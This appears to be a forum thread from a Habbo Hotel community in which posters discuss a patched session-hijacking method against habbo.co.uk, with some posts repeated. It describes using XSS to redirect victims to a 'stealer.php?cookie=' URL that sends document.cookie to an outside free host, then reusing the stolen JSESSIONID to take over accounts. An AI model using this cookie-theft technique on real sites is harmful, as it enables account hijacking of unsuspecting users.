
I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).
It was with the JavaScript session ID given to each user when they sign/log in. You direct a person to a website and it sends you their JavaScript session ID, allowing you to use it on habbo and use their ID to sign into their account. It only worked if the habbo had been logged in for 20 minutes or less or it would time out (expire).
If they expired you can edit homepage, post comments etc.
For your other question, you can no longer exploit it due to the ID being hidden. It wasn't a fake login, if you directed someone to the site it automatically gave you an ID, they couldn't prevent it.
Also isn't it a PHP session ID rather than a JavaScript session ID? Hence 'PHPSESSID=blahblah'.
No, it's 'JSESSIONID='
I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).
Also isn't it a PHP session ID rather than a JavaScript session ID? Hence 'PHPSESSID=blahblah'.
MissAlice and Bill are the only two I think truly deserved it!
Back for a while!